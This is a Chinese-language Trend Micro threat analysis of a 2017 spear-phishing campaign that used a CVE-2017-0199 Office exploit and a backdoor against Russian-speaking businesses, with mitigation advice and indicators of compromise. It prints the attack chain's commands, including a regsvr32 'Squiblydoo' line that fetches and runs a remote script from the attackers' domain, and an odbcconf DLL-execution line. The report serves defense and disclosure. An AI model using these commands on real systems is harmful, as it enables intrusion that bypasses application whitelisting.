冒充業務和財務部門的電子郵件,夾帶後門程式攻擊企業

趨勢科技 TrendMicro 中小企業資安, 企業資安, 網路釣魚 Phishing

一起針對企業的惡意電子郵件攻擊活動利用漏洞攻擊結合Windows元件來植入新後門,讓攻擊者可以接管中毒系統。攻擊者利用各種合法Windows元件來執行惡意腳本; 這也讓偵測和封鎖變得更具困難,尤其是對使用白名單的解決方案來說。

趨勢科技在一個月內已經觀察到至少五波攻擊,每一波都會寄送數份惡意電子郵件給目標。受影響產業為金融機構(包括銀行)和礦業公司。值得注意的是,攻擊者在每波攻擊時都會利用多種手法來寄送電子郵件給每個目標。

這起攻擊的相關惡意動態連結函式庫(DLL)樣本最早在2017年6月6日被上傳到VirusTotal,這跟我們在6月的最後一周和7月27日間看到一連串的電子郵件攻擊的時間點相近。

推測這起攻擊應該仍在進行中,少量散播和社交工程誘餌的特定性顯示出這可能是起魚叉式釣魚攻擊(SPEAR PHISHING)攻擊活動。

 

圖1、惡意電子郵件活動的攻擊鏈

 

圖2、送給一個目標的不同惡意電子郵件(時間順序為自左向右,順時針方向)

圖3、寄給礦業公司的郵件樣本

 

冒充業務和財務部門的電子郵件, 含doc文件附件

 感染鏈的起始點是設計成看似來自業務和財務部門的電子郵件。趨勢科技看到一個俄語樣本使用主旨為“Правила подключения к шлюзу”,也就是“連接閘道的規則“。另一個主旨是”Оплата госпошлин“,意思是“國家責任付款”。

這些電子郵件包含使用各種檔名的.doc文件附件。我們已經看過文件檔名使用Инструкция для подключения клиентов.doc(連接客戶端的說明)和  Заявление на оплату услуги .doc(服務支付的應用程式)

圖4、帶有DOC文件的電子郵件

 

這些檔案事實上是被趨勢科技偵測為TROJ_EXPLOYT.JEJORC的惡意RTF檔案。它會攻擊Microsoft Office的Windows物件連結和嵌入(OLE)介面漏洞(CVE-2017-0199)。實際上,我們也看過其他攻擊者利用這個安全漏洞。

漏洞攻擊碼會從hxxps://wecloud[.]biz/m11[.]xls下載一份假XLS檔案。這起攻擊所有網址所用的這網域是被攻擊者所控制,在七月初被註冊。

這份假Excel檔案內嵌了惡意JavaScript。Excel標頭實際上會被忽略,檔案將會被mshta.exe(處理/開啟HTA或HTML檔案的Windows元件)當作HTML應用程式處理。

 

圖5至圖6、XLS檔案標頭和JavaScript程式碼

 

m11.xls內的JavaScript包含兩個PowerShell腳本。第一個腳本會下載並執行一份誘餌文件,第二個會下載其他檔案來繼續感染鏈。

圖7、來自第一個PowerShell腳本的文件誘餌

圖8、新下載檔案的內容

這檔案使用AES-CBC加密演算法進行解密,然後儲存到%APPDATA%資料夾,使用隨機檔案名稱和.TXT副檔名。解密的檔案是一個動態連結函式庫(DLL)檔案,被偵測為TROJ_DROPNAKJS.ZGEG-A。

圖9、解密的檔案

 

m11.xls內的JavaScript程式碼接著會用下列指令執行該檔案:

odbcconf.exe /S /A {REGSVR C:\Users\Administrator\AppData\Roaming\{RANDOM}.txt}

 

這程式(odbcconf.exe)是執行與微軟資料存取組件(MDAC)相關的各種工作。上述指令被利用來執行DLL檔案。

一旦執行,這DLL檔會植入一個檔案到%APPDATA%資料夾。這檔案帶有.txt副檔名。這實際上是一個SCT檔案(Windows scriptlet),通常是用來宣告變數、定義表達式和在網頁中加入函式程式碼。在此案例中,它具備一個惡意混淆過的JavaScript檔案(JS_NAKJS.ZIEG-A)。

圖10、植入的XML檔案顯示出混淆過的下載器程式碼

 

這DLL會以下列指令執行SCT檔案:

regsvr32.exe /s /n /u /i:”C:\Users\Administrator\AppData\Roaming\{RANDOM}.txt” scroBj.dll

 

這指令利用了Regsvr32(微軟註冊伺服器)工具,這通常是用來在Windows註冊表註冊或取消註冊OLE控制項,包括了DLL檔案。這種攻擊方法也被稱為Squiblydoo – 利用Regsvr32來繞過限制並執行腳本。這也表示可以繞過應用程式白名單防護(如AppLocker)。雖然Squiblydoo是已知的攻擊方式,但這是我們第一次看到它跟odbcconf.exe聯合起來。

上述指令一旦被解開,就會執行另一個XML檔案,該檔案下載自hxxps://wecloud[.]biz/mail/changelog[.]txt。這個檔案會是主要的後門程式。

圖11、組成命令來發動最後的有效載荷

 

相同指令格式被用來發動最終的有效載荷(JS_GETFO.ZHEG-A)。需要注意的是,由於加上/ i,程式碼直接取自一個網址:

regsvr32.exe /s /n /u /i: hxxps://wecloud[.]biz/mail/changelog[.]txt scroBj.dll

這是另一個帶有混淆過JavaScript程式碼的SCT檔案,包含了後門指令,可以讓攻擊者接管中毒系統。它會試著連上hxxps://wecloud[.]biz/mail/ajax[.]php來從C&C伺服器取得任務進行,其中包括了:

  • D&exec =下載和執行PE檔案
  • gtfo = 刪除檔案/啟動項和終止
  • more_eggs = 下載其它/新腳本
  • more_onion = 執行新腳本並終止目前腳本
  • more_power = 執行指令

 

解決方法

雖然感染鏈的後期階段使用了各種Windows元件,進入點仍然有使用到微軟Office漏洞。安裝修補程式和保持軟體更新可以保護使用者。還可以使用防火牆、入侵偵測和防禦系統、虛擬修補及網址分類,還有確實執行修補程式管理政策都可以有效地減少系統受攻擊面。

除了落實最低權限原則,系統管理員還應該考慮停用使用者不需用到的系統元件。另一種選項是封鎖可能的指令直譯器和不常用的應用程式,即便它們是Windows元件。這樣做可能會影響到合法系統功能,但可以提高安全性。

 

趨勢科技解決方案

使用XGen端點防護技術的趨勢科技趨勢科技 OfficeScan™具備漏洞防護功能可以保護系統不受已知和未知的漏洞攻擊,甚至在修補程式部署之前。趨勢科技的端點解決方案如趨勢科技趨勢科技 Smart Protection Suites 和Worry-Free Pro可以偵測和封鎖惡意檔案及相關惡意網址,保護使用者和企業不受這些威脅侵擾。

入侵指標(IOC):

偵測為TROJ_EXPLOYT.JEJORC的哈希值(SHA-256):

  • 25c46c068dbee7bd77cf762ed140c80ddaf439d118f51080e92478f982848a30
  • 2d23b519931072632b8b6c0c9560d95414dd1639df895694dff7e5ea19fe5182

 

偵測為TROJ_DROPNAKJS.ZGEG-A的哈希值(SHA-256):

  • 52d69c91fba8435398870d480f37e87f0a9f7ee721473c98659f5b94b1c91abb

 

偵測為TROJ_DROPNAKJS.ZGEG-A的惡意DLL(SHA-256):

  • ff94ded03a42857c7c534229859b99e034745177184791df3084b6dde66b29e6
  • 0a424531b7c46a72a6f1e2b5a0449b487d30b2f5389a2b86720e278f07ae976b
  • 4e73334972d6b01650c572fd58596479e68edeb8337962a19e0a76579a9b4ecc
  • 81c400f0345b5b84fc484b4446b1b7fec5598083056c8012a308f8d38d44667e
  • 727e28c21462cdd3f28991305d16063c871c64674edae061f95e16c9f474fe13
  • cb7f5dd7b0d6465a2d0b83042154f4329f6b7b2727c5ed17b95d777e43f437e1

 

惡意電子郵件活動相關網址:

  • hxxps://mail[.]webmaster-1[.]kz/include/changelog[.]txt
  • hxxps://getupdates[.]kz/ch582/changelog[.]txt
  • hxxps://address-in[.]kz/client/changelog[.]txt
  • hxxp://mail[.]maincdn[.]biz/s1/v111[.]xls
  • hxxps://mail[.]maincdn[.]biz/info/changelog[.]txt
  • hxxps://mail[.]maincdn[.]biz/s1/p11[.]db

 

@原文出處:Backdoor-carrying Emails Set Sights on Russian-speaking Businesses 作者: 趨勢科技(Lenart Bermejo,Ronnie Giagone,Rubio Wu和Flyodor Yarochkin)

【Cloudsec 2017 企業資安高峰論壇-請把握最後報名機會,席次保留倒數中。。 】

今年的主題包含最熱門的物聯網安全,讓您在享受其美好以及便利性之時,也了解不能忽視的漏洞。以下的議題也是身為資安領航者應該要了解的面向 :
• 金融科技犯罪案例大剖析
• 駭客為何總是有辦法一駭再駭?
• AI 打造人工智慧安全,您知道如何辦到嗎?
• 令人聞之色變的勒索病毒已經結合APT的手法全面入侵,企業要如何全身而退?

如此精彩詳實的內容,席次即將額滿,如果您已經報名,9/6請務必出席,如果您還未報名,請即刻行動,把握最後倒數席次

 

相關文章:

《看漫畫談資安 》「 Apple ID 帳號復原通知」有可能是網路釣魚?!
假「雙子殺手」線上看,真騙 LINE 帳密!
《看漫畫談資安》在家遠端工作應注意的資安重點
BlackSquid 利用八種知名漏洞潛入伺服器與磁碟,並植入 XMRig 挖礦程式